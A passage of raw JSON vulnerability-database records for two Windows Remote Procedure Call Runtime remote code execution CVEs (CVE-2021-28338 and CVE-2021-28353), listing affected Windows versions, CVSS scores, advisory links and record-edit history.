"SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28338"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-14T11:37:54", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28338", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28338"}], "hash": "d04d1409c9d7a51c82004dfa8e06f32fad67582d9040942d8cb4f3e0a5450f36", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "645d9bdffc19052ee81cb44f1b14d612", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "62e8ad1b8c3700fc74ffff59d9130ce1", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "6aefee817c9df1154a1099e542765bde", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "2427fcc067deb674865cdb7a1b7e02b4", "key": "href"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "8c0499ea6482cc2d9345ff599f9cf633", "key": "extraReferences"}, {"hash": "ffaff68fab990a215ada8bdc1d12277b", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "40c747f3c7fe2582f50d51b1b5116564", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28338", "id": "CVE-2021-28338", "immutableFields": [], "lastseen": "2021-04-14T11:37:54", "modified": "2021-04-13T20:35:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28338"], "reporter": "cve@mitre.org", "title": "CVE-2021-28338", "type": "cve", "viewCount": 1}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-14T11:37:54"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d5b812c11bd119f970b8a32c5b252c9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "122bdba5509c507afa2962a93b3d1c93"}, {"key": "cpe23", "hash": "d8397aaca09c3d41cbbd37f93b216f7e"}, {"key": "cpeConfiguration", "hash": "64c56abb30602eab96958881fd107551"}, {"key": "cvelist", "hash": "ffaff68fab990a215ada8bdc1d12277b"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "645d9bdffc19052ee81cb44f1b14d612"}, {"key": "extraReferences", "hash": "bf2962b724a170e86e963359b8b61c71"}, {"key": "href", "hash": "2427fcc067deb674865cdb7a1b7e02b4"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "56970f93ddbac96aee2af3141137aa63"}, {"key": "published", "hash": "466c447b6119a8be9494fae20b17c9a1"}, {"key": "references", "hash": "6aefee817c9df1154a1099e542765bde"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "62e8ad1b8c3700fc74ffff59d9130ce1"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "97ba25169cb1ca6948c4490559ac9349123383ff9ce71abe60051d03330c8331", "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2021-28338"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001335.NASL"]}, {"type": "kaspersky", "idList": ["KLA12139", "KLA12142"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}], "modified": "2021-04-28T11:49:18", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2021-04-28T11:49:18", "rev": 2}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}]}}, "objectVersion": "1.5", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28338", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28338"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null}, {"id": "CVE-2021-28353", "bulletinFamily": "NVD", "title": "CVE-2021-28353", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "published": "2021-04-13T20:15:00", "modified": "2021-04-16T21:08:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28353", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28353"], "cvelist": ["CVE-2021-28353"], "immutableFields": [], "type": "cve", "lastseen": "2021-04-28T11:49:18", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-28353"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T11:37:54", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28353"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-14T11:37:54", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383170976112861186", "text": " NEW: CVE-2021-28353 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Rmd0kalZ08?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976112861186", "text": " NEW: CVE-2021-28353 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Rmd0kalZ08?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28353", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28353"}], "hash": "c91430b2bb87f5b241cf510f3f0314309eb87df60b989a5efd6f2dbc85778ba5", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "82f042e5d4fed205981e7821e38a5395", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "c215fd8747804f22d38978ae9b5cee23", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "88e8be8cd126081782597b415bd9d255", "key": "href"}, {"hash": "ec8f70944922bf3c056059e3fea156bc", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "fa7d6b4c1611cd4d76c884c3338dcfbf", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9acace2388b344d4fa64bf571e1ea2b8", "key": "description"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "40c747f3c7fe2582f50d51b1b5116564", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28353", "id": "CVE-2021-28353", "immutableFields": [], "lastseen": "2021-04-14T11:37:54", "modified": "2021-04-13T20:35:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28353"], "reporter": "cve@mitre.org", "title": "CVE-2021-28353", "type": "cve", "viewCount": 0}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-14T11:37:54"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-28353"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["NVD-CWE-noinfo"], "description": "Remote 